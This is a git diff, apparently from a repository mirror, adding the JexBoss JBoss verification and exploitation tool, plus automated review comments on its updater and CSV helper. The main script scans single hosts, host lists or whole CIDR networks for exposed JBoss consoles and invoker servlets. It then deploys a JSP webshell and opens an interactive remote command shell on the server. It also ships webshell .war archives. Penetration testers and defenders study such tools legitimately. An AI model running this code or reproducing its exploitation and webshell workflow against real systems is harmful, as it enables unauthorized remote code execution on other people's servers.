tup(current_version): + print ( + GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC + + GREEN + " * Link: %s\n" % link + + GREEN + " * Release notes:") + for note in notes: + print (" %s" % note) + return True + else: + return False \ No newline at end of file diff --git a/Jboss_Verify_EXploitation/demo.png b/Jboss_Verify_EXploitation/demo.png new file mode 100644 index 0000000..2c11cb3 Binary files /dev/null and b/Jboss_Verify_EXploitation/demo.png differ diff --git a/Jboss_Verify_EXploitation/jexboss.py b/Jboss_Verify_EXploitation/jexboss.py new file mode 100644 index 0000000..e8aec4a --- /dev/null +++ b/Jboss_Verify_EXploitation/jexboss.py 
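Review bot: `last_version` in check_updates is only bound when a `last_version` line is found in the response, so a malformed or truncated releases.txt raises NameError at the `tup(last_version)` comparison instead of returning False; initialise it next to `date_last_version` (`last_version = None`) and return False before comparing when it is still None. The update channel itself is unverified: the version file is fetched over plain http and the archive that auto_update extracts over the tool's own files is downloaded through a PoolManager built with `cert_reqs='CERT_NONE'`, so neither the version check nor the replacement code is tied to the expected origin; the updater's pool should use `cert_reqs='CERT_REQUIRED'` with a `ca_certs=` bundle, and the version file should come over https (or carry a hash the client checks). auto_update also keeps the ZipFile outside a `with` block, and `extractall` on an untrusted archive should be preceded by a check that every member name stays under `jexboss-master/`.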
@@ -0,0 +1,544 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +""" +JexBoss: Jboss verify and EXploitation Tool +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" +import textwrap +import traceback + + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + +__author__ = "João Filho Matos Figueiredo " +__version = "1.0.12" + +from sys import argv, exit, version_info + +if version_info[0] == 2 and version_info[1] < 7: + print(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n" + "" + GREEN + " Please install the Python version >= 2.7. \n\n" + " Example for CentOS using Software Collections scl:\n" + " # yum -y install centos-release-scl\n" + " # yum -y install python27\n" + " # scl enable python27 bash\n" + ENDC) + exit(0) + +import signal +from _exploits import * +from _updates import * +from os import name, system +import os +import shutil +from zipfile import ZipFile +from time import sleep +from random import randint +import argparse, socket + + +try: + from urllib.parse import urlencode +except ImportError: + from urllib import urlencode + +try: + from urllib3.util import parse_url + from urllib3 import disable_warnings, PoolManager + from urllib3.util.timeout import Timeout +except ImportError: + print(RED1 + BOLD + "\n * Package urllib3 not installed. 
Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + exit(0) + +try: + import ipaddress +except: + print(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + exit(0) + +from urllib3 import disable_warnings, PoolManager +from urllib3.util.timeout import Timeout + +disable_warnings() + +timeout = Timeout(connect=3.0, read=6.0) +pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + +global gl_interrupted +gl_interrupted = False + +user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", + "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9", + "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36", + "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", + "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0", + "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36", + "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"] + +global gl_args + + +def handler_interrupt(signum, frame): + global 
gl_interrupted + gl_interrupted = True + print ("Interrupting execution ...") + +signal.signal(signal.SIGINT, handler_interrupt) + +def get_successfully(url, path): + """ + Test if a GET to a URL is successful + :param url: The base URL + :param path: The URL path + :return: The HTTP status code + """ + sleep(5) + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + r = pool.request('GET', url + path, redirect=False, headers=headers) + result = r.status + if result == 404: + sleep(7) + r = pool.request('GET', url + path, redirect=False, headers=headers) + result = r.status + return result + + +def check_connectivity(host, port): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + s.connect((str(host), int(port))) + s.close() + except socket.timeout: + return False + except: + return False + + + return True + + +def check_vul(url): + """ + Test if a GET to a URL is successful + :param url: The URL to test + :return: A dict with the exploit type as the keys, and the HTTP status code as the value + """ + if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan': + timeout = Timeout(connect=1.0, read=3.0) + pool = PoolManager(timeout=timeout, retries=1, cert_reqs='CERT_NONE') + else: + timeout = Timeout(connect=3.0, read=6.0) + pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + + url_check = parse_url(url) + if '443' in str(url_check.port) and url_check.scheme != 'https': + url = "https://"+str(url_check.host)+":"+str(url_check.port) + + print(GREEN + "\n ** Checking Host: %s **\n" % url) + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", + "web-console" : 
"/web-console/ServerInfo.jsp", + "JMXInvokerServlet": "/invoker/JMXInvokerServlet", + "admin-console" : "/admin-console/"} + + for i in paths.keys(): + if gl_interrupted: break + try: + print(GREEN + " * Checking %s: \t" % i + ENDC), + r = pool.request('HEAD', url +str(paths[i]), redirect=False, headers=headers) + paths[i] = r.status + + # check if it's false positive + if len(r.getheaders()) == 0: + print(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC) + paths = {"jmx-console": 505, + "web-console": 505, + "JMXInvokerServlet": 505, + "admin-console": 505} + break + + if paths[i] in (301, 302, 303, 307, 308): + url_redirect = r.get_redirect_location() + print(GREEN + "[ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect) + elif paths[i] == 200 or paths[i] == 500: + if i == "admin-console": + print(RED + "[ EXPOSED ]" + ENDC) + else: + print(RED + "[ VULNERABLE ]" + ENDC) + else: + print(GREEN + "[ OK ]") + except: + print(RED + "\n * An error occurred while connecting to the host %s\n" % url + ENDC) + paths[i] = 505 + + return paths + +def auto_exploit(url, exploit_type): + """ + Automatically exploit a URL + :param url: The URL to exploit + :param exploit_type: One of the following + exploitJmxConsoleFileRepository: tested and working in JBoss 4 and 5 + exploitJmxConsoleMainDeploy: tested and working in JBoss 4 and 6 + exploitWebConsoleInvoker: tested and working in JBoss 4 + exploitJMXInvokerFileRepository: tested and working in JBoss 4 and 5 + exploitAdminConsole: tested and working in JBoss 5 and 6 (with default password) + """ + print(GREEN + "\n * Sending exploit code to %s. 
Please wait...\n" % url) + result = 505 + if exploit_type == "jmx-console": + result = exploit_jmx_console_file_repository(url) + if result != 200 and result != 500: + result = exploit_jmx_console_main_deploy(url) + elif exploit_type == "web-console": + result = exploit_web_console_invoker(url) + elif exploit_type == "JMXInvokerServlet": + result = exploit_jmx_invoker_file_repository(url, 0) + if result != 200 and result != 500: + result = exploit_jmx_invoker_file_repository(url, 1) + elif exploit_type == "admin-console": + result = exploit_admin_console(url) + + if result == 200 or result == 500: + if not gl_args.auto_exploit: + print(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC) + shell_http(url, exploit_type) + else: + print(GREEN + " * Successfully deployed code via vector %s\n *** Run JexBoss in Standalone mode to open command shell. ***" %(exploit_type) + ENDC) + return True + else: + print(RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" + + " Waiting for 7 seconds...\n " + ENDC) + if gl_args.mode == 'standalone': + sleep(7) + return False + else: + return False + +def shell_http(url, shell_type): + """ + Connect to an HTTP shell + :param url: The URL to connect to + :param shell_type: The type of shell to connect to + """ + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + if gl_args.disable_check_updates: + headers['check-updates'] = 'false' + + if shell_type == "jmx-console" or shell_type == "web-console" or shell_type == "admin-console": + path = '/jexws3/jexws3.jsp?' + elif shell_type == "JMXInvokerServlet": + path = '/jexinv3/jexinv3.jsp?' 
+ + pool.request('GET', url+ path, redirect=False, headers=headers) + + sleep(7) + resp = "" + print(" * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n") + print(RED + " * " + url + ": \n" + ENDC) + + for cmd in ['uname -a', 'cat /etc/issue', 'id']: + cmd = urlencode({"ppp": cmd}) + r = pool.request('GET', url + path + cmd, redirect=False, headers=headers) + resp += " " + str(r.data).split(">")[1] + print(resp.replace('\\n', '\n')), + + while 1: + print(BLUE + "[Type commands or \"exit\" to finish]") + cmd = input("Shell> " + ENDC) if version_info[0] >= 3 else raw_input("Shell> " + ENDC) + if cmd == "exit": + break + + cmd = urlencode({"ppp": cmd}) + r = pool.request('GET', url + path + cmd, redirect=False, headers=headers) + resp = str(r.data) + if r.status == 404: + print(RED + " * Error contacting the command shell. Try again later...") + continue + stdout = "" + try: + stdout = resp.split("pre>")[1] + except: + print(RED + " * Error contacting the command shell. Try again later...") + if stdout.count("An exception occurred processing JSP page") == 1: + print(RED + " * Error executing command \"%s\". 
" % cmd.split("=")[1] + ENDC) + else: + print(stdout.replace('\\n', '\n')) + +def clear(): + """ + Clears the console + """ + if name == 'posix': + system('clear') + elif name == ('ce', 'nt', 'dos'): + system('cls') + +def banner(): + """ + Print the banner + """ + clear() + print(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" + " | |\n" + " | @author: João Filho Matos Figueiredo |\n" + " | @contact: joaomatosf@gmail.com |\n" + " | |\n" + " | @update: https://github.com/joaomatosf/jexboss |\n" + " #______________________________________________________#\n") + print(RED1 + " @version: %s\n"%__version ) + + print (ENDC) + +def help_usage(): + usage = (BOLD + BLUE + "\n Examples:\n" + ENDC + + BLUE + "\n For simple usage, you must provide the host name or IP address you want to test:" + + GREEN + "\n\n $ python jexboss.py -host https://site.com.br" + + BLUE + "\n\n For auto scan mode, you must provide the network in CIDR format, list of ports and filename for store results:" + + GREEN + "\n\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log" + + BLUE + "\n\n For file scan mode, you must provide the filename with host list to be scanned (one host per line)and filename for store results:" + + GREEN + "\n\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log" + ENDC) + return usage + +def network_args(string): + try: + if version_info[0] >= 3: + value = ipaddress.ip_network(string) + else: + value = ipaddress.ip_network(unicode(string)) + except: + msg = "%s is not a network address in CIDR format." % string + raise argparse.ArgumentTypeError(msg) + return value + +def main(): + """ + Run interactively. Call when the module is run by itself. 
+ :return: Exit code + """ + # check for Updates + updates = check_updates() + if updates: + print(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" + + " Do you want to update now?") + pick = input(" YES/no ? ").lower() if version_info[0] >= 3 else raw_input(" YES/no ? ").lower() + print (ENDC) + if pick != "no": + updated = auto_update() + if updated: + print(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" +ENDC) + exit(0) + else: + print(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" +ENDC) + exit(1) + + vulnerables = False + # check vulnerabilities for standalone mode + if gl_args.mode == 'standalone': + url = gl_args.host + scan_results = check_vul(url) + # performs exploitation + for i in ["jmx-console", "web-console", "JMXInvokerServlet", "admin-console"]: + if scan_results[i] == 200 or scan_results[i] == 500: + vulnerables = True + if gl_args.auto_exploit: + auto_exploit(url, i) + else: + print(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" + + BOLD + i + NORMAL + "\" ?\n" + + " This operation will provide a simple command shell to execute commands on the server..\n" + + RED + " Continue only if you have permission!" + ENDC) + pick = input(" yes/NO ? ").lower() if version_info[0] >= 3 else raw_input(" yes/NO ? 
").lower() + if pick == "yes": + auto_exploit(url, i) + # check vulnerabilities for auto scan mode + elif gl_args.mode == 'auto-scan': + file_results = open(gl_args.results, 'w') + file_results.write("JexBoss Scan Mode Report\n\n") + for ip in gl_args.network.hosts(): + if gl_interrupted: break + for port in gl_args.ports.split(","): + if check_connectivity(ip, port): + url = "{0}:{1}".format(ip,port) + ip_results = check_vul(url) + for key in ip_results.keys(): + if ip_results[key] == 200 or ip_results[key] == 500: + vulnerables = True + if gl_args.auto_exploit: + result_exploit = auto_exploit(url, key) + if result_exploit: + file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) + + file_results.flush() + else: + print (RED+"\n * Host %s:%s does not respond."% (ip,port)+ENDC) + file_results.close() + + elif gl_args.mode == 'file-scan': + file_results = open(gl_args.out, 'w') + file_results.write("JexBoss Scan Mode Report\n\n") + file_input = open(gl_args.file, 'r') + for url in file_input.readlines(): + if gl_interrupted: break + url = url.strip() + ip = str(parse_url(url)[2]) + port = parse_url(url)[3] if parse_url(url)[3] != None else 80 + if check_connectivity(ip, port): + url_results = check_vul(url) + for key in url_results.keys(): + if url_results[key] == 200 or url_results[key] == 500: + vulnerables = True + if gl_args.auto_exploit: + result_exploit = auto_exploit(url, key) + if result_exploit: + file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) + + file_results.flush() + else: + print (RED + "\n * Host %s:%s does not respond." 
% (ip, port) + ENDC) + file_results.close() + + # resume results + if vulnerables: + banner() + print(RED + BOLD+" Results: potentially compromised server!" + ENDC) + if gl_args.mode == 'file-scan': + print(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC) + elif gl_args.mode == 'auto-scan': + print(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC) + print(GREEN + " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" + +BOLD+ " Recommendations: \n" +ENDC+ + GREEN+ " - Remove web consoles and services that are not used, eg:\n" + " $ rm web-console.war\n" + " $ rm http-invoker.sar\n" + " $ rm jmx-console.war\n" + " $ rm jmx-invoker-adaptor-server.sar\n" + " $ rm admin-console.war\n" + " - Use a reverse proxy (eg. nginx, apache, F5)\n" + " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n" + " - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n\n" + " References:\n" + " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n" + " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n" + "\n" + " - If possible, discard this server!\n" + " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n") + else: + print(GREEN + "\n\n * Results: \n" + + " The server is not vulnerable to bugs tested ... :D\n\n" + ENDC) + # infos + print(ENDC + " * Info: review, suggestions, updates, etc: \n" + + " https://github.com/joaomatosf/jexboss\n") + + print(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" + " including research to new versions of JBoss and zero days. 
\n\n" + + GREEN + BOLD + " * Paypal: " + ENDC + " joaomatosf@gmail.com \n" + + GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n" + + GREEN + BOLD + " * URI: " + ENDC + " bitcoin:14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C?label=jexboss\n") + + +print(ENDC) + +banner() + + +if __name__ == "__main__": + + parser = argparse.ArgumentParser( + formatter_class=argparse.RawDescriptionHelpFormatter, + #description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version, + description=textwrap.dedent(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" + " | |\n" + " | @author: João Filho Matos Figueiredo |\n" + " | @contact: joaomatosf@gmail.com |\n" + " | |\n" + " | @update: https://github.com/joaomatosf/jexboss |\n" + " #______________________________________________________#\n" + " @version: "+__version+"\n"+ help_usage()), + epilog="", + prog="JexBoss" + ) + + group_standalone = parser.add_argument_group('Standalone mode') + group_auto_scan = parser.add_argument_group('Auto scan mode') + group_file_scan = parser.add_argument_group('File scan mode') + + parser.add_argument('--version', action='version', version='%(prog)s ' + __version) + parser.add_argument("--auto-exploit", "-A", + help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)", + action='store_true') + parser.add_argument("--disable-check-updates", "-D", help="Disable the check for updates performed by JSP Webshell at: http://webshell.jexboss.net/jsp_version.txt", + action='store_true') + parser.add_argument('-mode', help="Operation mode", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone') + + group_standalone.add_argument("-host", help="Host address to be checked (eg. http://192.168.0.10:8080)", + type=str) + group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 
10.0.0.0/8)",
+ type=network_args, default='192.168.0.0/24')
+ group_auto_scan.add_argument("-ports",
+ help="List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)", type=str, default='8080,80')
+ group_auto_scan.add_argument("-results",
+ help="File name to store the auto scan results", type=str, metavar='FILENAME', default='jexboss_auto_scan_results.log')
+
+ group_file_scan.add_argument("-file", help="Filename with host list to be scanned (one host per line)", type=str, metavar='FILENAME_HOSTS')
+ group_file_scan.add_argument("-out", help="File name to store the file scan results", type=str, metavar='FILENAME_RESULTS', default='jexboss_file_scan_results.log')
+
+ gl_args = parser.parse_args()
+
+ #if 'h' not in gl_args and gl_args.host == None:
+ # parser.print_help()
+
+ if gl_args.mode == 'standalone' and gl_args.host == None or \
+ gl_args.mode == 'file-scan' and gl_args.file == None:
+ banner()
+ exit(0)
+ else:
+ main()
diff --git a/Jboss_Verify_EXploitation/jexcsv.py b/Jboss_Verify_EXploitation/jexcsv.py
new file mode 100644
index 0000000..c2d9cde
--- /dev/null
+++ b/Jboss_Verify_EXploitation/jexcsv.py
@@ -0,0 +1,62 @@
+"""
+Check URLs for JBoss vulnerabilities in bulk and output results to a CSV file
+
+Copyright 2016 Sean Whalen
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+"""
+
+from argparse import ArgumentParser
+from csv import DictWriter
+
+from jexboss import check_vul
+
+__version__ = "1.0.0"
+__author__ = "Sean Whalen - @SeanTheGeek"
+
+args = ArgumentParser(description=__doc__)
+args.add_argument("input", help="Path to the input file")
+args.add_argument("output", help="Path to the output file")
+args = args.parse_args()
+
+paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
+ "web-console" : "/web-console/ServerInfo.jsp",
+ "JMXInvokerServlet": "/invoker/JMXInvokerServlet"}
+
+results = []
+
+with open(args.input, "r") as input_file:
+ urls = input_file.readlines()
+
+
+for url in urls:
+ if url == "":
+ continue
+ if not url.startswith("http"):
+ url = "http://{0}".format(url)
+ url = url.strip()
+ if url.endswith("/"):
+ url = url[:-1]
+
+ url_results = check_vul(url)
+ for key in url_results.keys():
+ if url_results[key] == 200 or url_results[key] == 500:
+ full_url = "{0}{1}".format(url, paths[key])
+ result = dict(base_url=url, vulnerability=key, full_url=full_url, status_code=url_results[key])
+ results.append(result)
+
+fields = ["base_url", "vulnerability", "full_url", "status_code"]
+with open(args.output, "w") as output_file:
+ writer = DictWriter(output_file, fields)
+ writer.writeheader()
+ writer.writerows(results)
diff --git a/Jboss_Verify_EXploitation/requires.txt b/Jboss_Verify_EXploitation/requires.txt
new file mode 100644
index 0000000..3fe0b6b
--- /dev/null
+++ b/Jboss_Verify_EXploitation/requires.txt
@@ -0,0 +1,2 @@
+urllib3
+ipaddress
diff --git a/Jboss_Verify_EXploitation/screenshots/help_usage.png b/Jboss_Verify_EXploitation/screenshots/help_usage.png
new file mode 100644
index 0000000..a219c5e
Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/help_usage.png differ
diff --git a/Jboss_Verify_EXploitation/screenshots/network_scan_mode.png b/Jboss_Verify_EXploitation/screenshots/network_scan_mode.png
new file mode 100644
index 0000000..2345670
Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/network_scan_mode.png differ
diff --git a/Jboss_Verify_EXploitation/screenshots/results_and_recommendations.png b/Jboss_Verify_EXploitation/screenshots/results_and_recommendations.png
new file mode 100644
index 0000000..1402ce9
Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/results_and_recommendations.png differ
diff --git a/Jboss_Verify_EXploitation/screenshots/scan_with_auto_exploit_mode.png b/Jboss_Verify_EXploitation/screenshots/scan_with_auto_exploit_mode.png
new file mode 100644
index 0000000..211b949
Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/scan_with_auto_exploit_mode.png differ
diff --git a/Jboss_Verify_EXploitation/screenshots/standalone_mode.png b/Jboss_Verify_EXploitation/screenshots/standalone_mode.png
new file mode 100644
index 0000000..e326188
Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/standalone_mode.png differ
diff --git a/Jboss_Verify_EXploitation/util/jbossass.war b/Jboss_Verify_EXploitation/util/jbossass.war
new file mode 100644
index 0000000..387f8f0
Binary files /dev/null and b/Jboss_Verify_EXploitation/util/jbossass.war differ
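Review bot: The blank-line guard `if url == "": continue` at the top of the `for url in urls` loop never fires, because `readlines()` keeps the trailing newline, so an empty input line becomes `"http://"` once the prefix is added and stripped and is still handed to `check_vul`. Stripping first and testing truthiness fixes it: `url = url.strip()` then `if not url: continue`, with the `startswith("http")` check after that. The `paths[key]` lookup also assumes every key `check_vul` reports is one of the three entries in `paths`; `check_vul` lives in jexboss.py outside this hunk, so if it ever returns another key the run dies with a KeyError after all hosts have been probed and before any row is written — `paths.get(key, "")` or writing rows as they are found would be more robust. For the output file, Python 3's `csv` module expects `open(args.output, "w", newline="")` to avoid doubled line endings on Windows, though the README targets Python >= 2.7 where that argument does not exist, so this may need a version guard.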
diff --git a/Jboss_Verify_EXploitation/util/jexws.war b/Jboss_Verify_EXploitation/util/jexws.war
new file mode 100644
index 0000000..387f8f0
Binary files /dev/null and b/Jboss_Verify_EXploitation/util/jexws.war differ